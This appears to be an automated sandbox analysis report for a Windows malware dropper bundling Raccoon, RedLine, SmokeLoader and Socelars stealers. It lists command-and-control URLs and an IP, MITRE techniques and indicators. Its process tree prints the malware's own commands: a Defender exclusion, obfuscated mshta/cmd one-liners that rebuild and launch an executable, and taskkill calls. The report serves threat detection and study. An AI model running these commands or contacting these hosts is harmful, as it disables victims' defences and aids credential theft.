raccoon | 400debff42246bcf28d1eba937480ebdfa755c932707db10ab58ec4a1f5e94f1

Resubmissions

10-11-2021 14:52

211110-r84p8aedej 10

09-11-2021 13:19

211109-qkrv3sfcg4 10

Analysis

max time kernel
50s
max time network
170s
platform
windows7_x64
resource
win7-en-20211014
submitted
09-11-2021 13:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
Size

4.6MB
MD5

664aed619fcf50da08dc9d74f48aad57
SHA1

995df8d6655cf256187df9bc9699bdd094c33616
SHA256

243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493
SHA512

c2b5326396712ef94b51ab52e5f655134978af980db04c09c3cb7a6fce5e236087da790a65b493c1e9760617a2867070ad824a2d458f38a65916594d313254fc

Score

10^/10

raccoon redline smokeloader socelars 2f2ad1a1aa093c5a9d17040c8efd5650a99640b5 media18 aspackv2 backdoor evasion infostealer spyware stealer trojan

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

raccoon

Botnet

2f2ad1a1aa093c5a9d17040c8efd5650a99640b5

Attributes

url4cnc
http://telegatt.top/oh12manymarty

http://telegka.top/oh12manymarty

http://telegin.top/oh12manymarty

https://t.me/oh12manymarty

rc4.plain

Extracted

Family

smokeloader

Version

2020

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

media18

91.121.67.60:2151

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

resource	yara_rule
behavioral19/memory/2704-252-0x000000000041B23E-mapping.dmp	family_redline
behavioral19/memory/2704-250-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral19/memory/2704-249-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral19/memory/2704-247-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 1 IoCs

resource	yara_rule
behavioral19/files/0x00050000000132e0-162.dat	family_socelars

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral19/files/0x00070000000121fc-65.dat	aspack_v212_v242
behavioral19/files/0x00070000000121fc-66.dat	aspack_v212_v242
behavioral19/files/0x00070000000121fe-64.dat	aspack_v212_v242
behavioral19/files/0x00070000000121fe-63.dat	aspack_v212_v242
behavioral19/files/0x0005000000013109-70.dat	aspack_v212_v242
behavioral19/files/0x0005000000013109-69.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 18 IoCs

pid	Process
368	setup_install.exe
1284	Tue16703646a5ae7.exe
1768	Tue16cea79fd58a17a.exe
1704	Tue165ca48696e212.exe
1544	Tue16af5513dabbf.exe
1932	Tue16d47340279.exe
268	Tue16c335f877.exe
1576	Tue1628cd68fb2319b0.exe
1036	Tue16b77353ecd495ba.exe
1056	Tue16a1e0194b6e612.exe
1636	Tue168e957580fbc2.exe
1260	Tue16b2877f8bd.exe
972	Tue16cea79fd58a17a.exe
1828	Tue166ff30c98d.exe
892	Tue165edc47615.exe
820	Tue1628cd68fb2319b0.tmp
1804	Tue1628cd68fb2319b0.exe
804	Tue1628cd68fb2319b0.tmp

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Control Panel\International\Geo\Nation	Tue16c335f877.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Control Panel\International\Geo\Nation	Tue16703646a5ae7.exe

Loads dropped DLL 64 IoCs

pid	Process
660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
368	setup_install.exe
368	setup_install.exe
368	setup_install.exe
368	setup_install.exe
368	setup_install.exe
368	setup_install.exe
368	setup_install.exe
368	setup_install.exe
1928	cmd.exe
1472	cmd.exe
684	cmd.exe
684	cmd.exe
1284	Tue16703646a5ae7.exe
1284	Tue16703646a5ae7.exe
1016	cmd.exe
1720	cmd.exe
1908	cmd.exe
1896	cmd.exe
1896	cmd.exe
1092	cmd.exe
1092	cmd.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
1576	Tue1628cd68fb2319b0.exe
1576	Tue1628cd68fb2319b0.exe
1960	cmd.exe
1636	Tue168e957580fbc2.exe
1636	Tue168e957580fbc2.exe
1036	Tue16b77353ecd495ba.exe
1036	Tue16b77353ecd495ba.exe
1544	Tue16af5513dabbf.exe
1544	Tue16af5513dabbf.exe
596	cmd.exe
568	cmd.exe
568	cmd.exe
848	cmd.exe
848	cmd.exe
1260	Tue16b2877f8bd.exe
1260	Tue16b2877f8bd.exe
892	Tue165edc47615.exe
892	Tue165edc47615.exe
1828	Tue166ff30c98d.exe
1828	Tue166ff30c98d.exe
1056	Tue16a1e0194b6e612.exe
1056	Tue16a1e0194b6e612.exe
1704	Tue165ca48696e212.exe
1704	Tue165ca48696e212.exe
1576	Tue1628cd68fb2319b0.exe
820	Tue1628cd68fb2319b0.tmp
820	Tue1628cd68fb2319b0.tmp
820	Tue1628cd68fb2319b0.tmp
820	Tue1628cd68fb2319b0.tmp
1804	Tue1628cd68fb2319b0.exe
1804	Tue1628cd68fb2319b0.exe
1984	WerFault.exe
1984	WerFault.exe
1984	WerFault.exe
1804	Tue1628cd68fb2319b0.exe
804	Tue1628cd68fb2319b0.tmp
804	Tue1628cd68fb2319b0.tmp
804	Tue1628cd68fb2319b0.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
43	ipinfo.io
44	ipinfo.io
45	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
1984	368	WerFault.exe	28
2768	1284	WerFault.exe	33
2864	268	WerFault.exe	53
2516	1260	WerFault.exe	46

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue166ff30c98d.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue166ff30c98d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue166ff30c98d.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
2424	taskkill.exe
2220	taskkill.exe
1828	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Tue16b2877f8bd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Tue16b2877f8bd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1828	Tue166ff30c98d.exe
1828	Tue166ff30c98d.exe
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
1272	Process not Found
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
268	Tue16c335f877.exe
1284	Tue16703646a5ae7.exe
1284	Tue16703646a5ae7.exe
1284	Tue16703646a5ae7.exe
1284	Tue16703646a5ae7.exe
1284	Tue16703646a5ae7.exe
268	Tue16c335f877.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1828	Tue166ff30c98d.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	1260	Tue16b2877f8bd.exe
Token: SeAssignPrimaryTokenPrivilege	1260	Tue16b2877f8bd.exe
Token: SeLockMemoryPrivilege	1260	Tue16b2877f8bd.exe
Token: SeIncreaseQuotaPrivilege	1260	Tue16b2877f8bd.exe
Token: SeMachineAccountPrivilege	1260	Tue16b2877f8bd.exe
Token: SeTcbPrivilege	1260	Tue16b2877f8bd.exe
Token: SeSecurityPrivilege	1260	Tue16b2877f8bd.exe
Token: SeTakeOwnershipPrivilege	1260	Tue16b2877f8bd.exe
Token: SeLoadDriverPrivilege	1260	Tue16b2877f8bd.exe
Token: SeSystemProfilePrivilege	1260	Tue16b2877f8bd.exe
Token: SeSystemtimePrivilege	1260	Tue16b2877f8bd.exe
Token: SeProfSingleProcessPrivilege	1260	Tue16b2877f8bd.exe
Token: SeIncBasePriorityPrivilege	1260	Tue16b2877f8bd.exe
Token: SeCreatePagefilePrivilege	1260	Tue16b2877f8bd.exe
Token: SeCreatePermanentPrivilege	1260	Tue16b2877f8bd.exe
Token: SeBackupPrivilege	1260	Tue16b2877f8bd.exe
Token: SeRestorePrivilege	1260	Tue16b2877f8bd.exe
Token: SeShutdownPrivilege	1260	Tue16b2877f8bd.exe
Token: SeDebugPrivilege	1260	Tue16b2877f8bd.exe
Token: SeAuditPrivilege	1260	Tue16b2877f8bd.exe
Token: SeSystemEnvironmentPrivilege	1260	Tue16b2877f8bd.exe
Token: SeChangeNotifyPrivilege	1260	Tue16b2877f8bd.exe
Token: SeRemoteShutdownPrivilege	1260	Tue16b2877f8bd.exe
Token: SeUndockPrivilege	1260	Tue16b2877f8bd.exe
Token: SeSyncAgentPrivilege	1260	Tue16b2877f8bd.exe
Token: SeEnableDelegationPrivilege	1260	Tue16b2877f8bd.exe
Token: SeManageVolumePrivilege	1260	Tue16b2877f8bd.exe
Token: SeImpersonatePrivilege	1260	Tue16b2877f8bd.exe
Token: SeCreateGlobalPrivilege	1260	Tue16b2877f8bd.exe
Token: 31	1260	Tue16b2877f8bd.exe
Token: 32	1260	Tue16b2877f8bd.exe
Token: 33	1260	Tue16b2877f8bd.exe
Token: 34	1260	Tue16b2877f8bd.exe
Token: 35	1260	Tue16b2877f8bd.exe
Token: SeDebugPrivilege	2424	taskkill.exe
Token: SeShutdownPrivilege	1272	Process not Found

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1272	Process not Found
1272	Process not Found
1272	Process not Found
1272	Process not Found

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1272	Process not Found
1272	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 660 wrote to memory of 368	660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe	28
PID 660 wrote to memory of 368	660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe	28
PID 660 wrote to memory of 368	660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe	28
PID 660 wrote to memory of 368	660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe	28
PID 660 wrote to memory of 368	660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe	28
PID 660 wrote to memory of 368	660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe	28
PID 660 wrote to memory of 368	660	243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe	28
PID 368 wrote to memory of 1104	368	setup_install.exe	30
PID 368 wrote to memory of 1104	368	setup_install.exe	30
PID 368 wrote to memory of 1104	368	setup_install.exe	30
PID 368 wrote to memory of 1104	368	setup_install.exe	30
PID 368 wrote to memory of 1104	368	setup_install.exe	30
PID 368 wrote to memory of 1104	368	setup_install.exe	30
PID 368 wrote to memory of 1104	368	setup_install.exe	30
PID 368 wrote to memory of 1472	368	setup_install.exe	31
PID 368 wrote to memory of 1472	368	setup_install.exe	31
PID 368 wrote to memory of 1472	368	setup_install.exe	31
PID 368 wrote to memory of 1472	368	setup_install.exe	31
PID 368 wrote to memory of 1472	368	setup_install.exe	31
PID 368 wrote to memory of 1472	368	setup_install.exe	31
PID 368 wrote to memory of 1472	368	setup_install.exe	31
PID 368 wrote to memory of 1928	368	setup_install.exe	32
PID 368 wrote to memory of 1928	368	setup_install.exe	32
PID 368 wrote to memory of 1928	368	setup_install.exe	32
PID 368 wrote to memory of 1928	368	setup_install.exe	32
PID 368 wrote to memory of 1928	368	setup_install.exe	32
PID 368 wrote to memory of 1928	368	setup_install.exe	32
PID 368 wrote to memory of 1928	368	setup_install.exe	32
PID 368 wrote to memory of 1756	368	setup_install.exe	35
PID 368 wrote to memory of 1756	368	setup_install.exe	35
PID 368 wrote to memory of 1756	368	setup_install.exe	35
PID 368 wrote to memory of 1756	368	setup_install.exe	35
PID 368 wrote to memory of 1756	368	setup_install.exe	35
PID 368 wrote to memory of 1756	368	setup_install.exe	35
PID 368 wrote to memory of 1756	368	setup_install.exe	35
PID 368 wrote to memory of 684	368	setup_install.exe	37
PID 368 wrote to memory of 684	368	setup_install.exe	37
PID 368 wrote to memory of 684	368	setup_install.exe	37
PID 368 wrote to memory of 684	368	setup_install.exe	37
PID 368 wrote to memory of 684	368	setup_install.exe	37
PID 368 wrote to memory of 684	368	setup_install.exe	37
PID 368 wrote to memory of 684	368	setup_install.exe	37
PID 368 wrote to memory of 1016	368	setup_install.exe	59
PID 368 wrote to memory of 1016	368	setup_install.exe	59
PID 368 wrote to memory of 1016	368	setup_install.exe	59
PID 368 wrote to memory of 1016	368	setup_install.exe	59
PID 368 wrote to memory of 1016	368	setup_install.exe	59
PID 368 wrote to memory of 1016	368	setup_install.exe	59
PID 368 wrote to memory of 1016	368	setup_install.exe	59
PID 1928 wrote to memory of 1284	1928	cmd.exe	33
PID 1928 wrote to memory of 1284	1928	cmd.exe	33
PID 1928 wrote to memory of 1284	1928	cmd.exe	33
PID 1928 wrote to memory of 1284	1928	cmd.exe	33
PID 1928 wrote to memory of 1284	1928	cmd.exe	33
PID 1928 wrote to memory of 1284	1928	cmd.exe	33
PID 1928 wrote to memory of 1284	1928	cmd.exe	33
PID 1104 wrote to memory of 1816	1104	cmd.exe	34
PID 1104 wrote to memory of 1816	1104	cmd.exe	34
PID 1104 wrote to memory of 1816	1104	cmd.exe	34
PID 1104 wrote to memory of 1816	1104	cmd.exe	34
PID 1104 wrote to memory of 1816	1104	cmd.exe	34
PID 1104 wrote to memory of 1816	1104	cmd.exe	34
PID 1104 wrote to memory of 1816	1104	cmd.exe	34
PID 368 wrote to memory of 1720	368	setup_install.exe	38

C:\Users\Admin\AppData\Local\Temp\243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
"C:\Users\Admin\AppData\Local\Temp\243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:660
- C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1104
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16af5513dabbf.exe
    3⤵
    - Loads dropped DLL
    PID:1472
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16af5513dabbf.exe
      Tue16af5513dabbf.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1544
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBScrIPt: ClOse ( CrEATeobjEct ( "wScRipt.SHELl").run ( "CMd /C tYpe ""C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16af5513dabbf.exe""> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If """" == """" for %E In ( ""C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16af5513dabbf.exe"" ) do taskkill -F /iM ""%~nXE"" ", 0, True ) )
        5⤵
        
        PID:2204
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16af5513dabbf.exe"> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If "" =="" for %E In ( "C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16af5513dabbf.exe" ) do taskkill -F /iM "%~nXE"
        6⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\fkKCS.exe
        
        fkKCS.EXE -P_3FA3g8_0NB
        7⤵
        
        PID:2256
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBScrIPt: ClOse ( CrEATeobjEct ( "wScRipt.SHELl").run ( "CMd /C tYpe ""C:\Users\Admin\AppData\Local\Temp\fkKCS.exe""> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If ""-P_3FA3g8_0NB "" == """" for %E In ( ""C:\Users\Admin\AppData\Local\Temp\fkKCS.exe"" ) do taskkill -F /iM ""%~nXE"" ", 0, True ) )
        8⤵
        
        PID:2136
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\fkKCS.exe"> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If "-P_3FA3g8_0NB " =="" for %E In ( "C:\Users\Admin\AppData\Local\Temp\fkKCS.exe" ) do taskkill -F /iM "%~nXE"
        9⤵
        
        PID:2436
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBscRipt: ClOSE( cREaTEOBjEcT ("wSCript.sheLl").RUN ( "Cmd.eXE /c echo N%TIme%O>VPZp.II & EChO | set /p = ""MZ"" > KL6F.Aa_ &cOpY /y /B kL6F.AA_+LAQIL0YY.POg + vCTGFFAM.2ST + ip~Q0M_L.i + IfY08H17.9LD + 1cQMG.2 + VpZp.II PUA9.FS & sTaRT msiexec.exe /Y .\pUA9.FS " ,0 , TRUe ) )
        8⤵
        
        PID:2340
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c echo N%TIme%O>VPZp.II & EChO | set /p = "MZ" > KL6F.Aa_ &cOpY /y /B kL6F.AA_+LAQIL0YY.POg + vCTGFFAM.2ST+ ip~Q0M_L.i + IfY08H17.9LD + 1cQMG.2 + VpZp.II PUA9.FS & sTaRT msiexec.exe /Y .\pUA9.FS
        9⤵
        
        PID:2492
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EChO "
        10⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>KL6F.Aa_"
        10⤵
        
        PID:2176
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F /iM "Tue16af5513dabbf.exe"
        7⤵
        Kills process with taskkill
        
        PID:1828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16703646a5ae7.exe
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1928
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16703646a5ae7.exe
      Tue16703646a5ae7.exe
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:1284
    - - C:\Users\Admin\Pictures\Adobe Films\M857AmZVkXYV8nP_3845VgLm.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\M857AmZVkXYV8nP_3845VgLm.exe"
        5⤵
        
        PID:2668
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 1508
        5⤵
        Program crash
        
        PID:2768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16cea79fd58a17a.exe
    3⤵
    PID:1756
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16cea79fd58a17a.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16cea79fd58a17a.exe"
      4⤵
      Executes dropped EXE
      PID:972
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16cea79fd58a17a.exe
      Tue16cea79fd58a17a.exe
      4⤵
      Executes dropped EXE
      PID:1768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue165ca48696e212.exe /mixone
    3⤵
    - Loads dropped DLL
    PID:684
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue165ca48696e212.exe
      Tue165ca48696e212.exe /mixone
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1704
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Tue165ca48696e212.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue165ca48696e212.exe" & exit
        5⤵
        
        PID:2316
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Tue165ca48696e212.exe" /f
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16c335f877.exe
    3⤵
    - Loads dropped DLL
    PID:1720
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16c335f877.exe
      Tue16c335f877.exe
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:268
    - - C:\Users\Admin\Pictures\Adobe Films\M857AmZVkXYV8nP_3845VgLm.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\M857AmZVkXYV8nP_3845VgLm.exe"
        5⤵
        
        PID:2656
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 268 -s 1460
        5⤵
        Program crash
        
        PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16a1e0194b6e612.exe
    3⤵
    - Loads dropped DLL
    PID:1092
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16a1e0194b6e612.exe
      Tue16a1e0194b6e612.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16b77353ecd495ba.exe
    3⤵
    - Loads dropped DLL
    PID:1896
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16b77353ecd495ba.exe
      Tue16b77353ecd495ba.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1036
    - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16b77353ecd495ba.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16b77353ecd495ba.exe
        5⤵
        
        PID:2704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16b2877f8bd.exe
    3⤵
    - Loads dropped DLL
    PID:596
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16b2877f8bd.exe
      Tue16b2877f8bd.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      PID:1260
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:3024
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:2220
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 588
        5⤵
        Program crash
        
        PID:2516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue165edc47615.exe
    3⤵
    - Loads dropped DLL
    PID:848
  - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue165edc47615.exe
      Tue165edc47615.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:892
    - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue165edc47615.exe
        
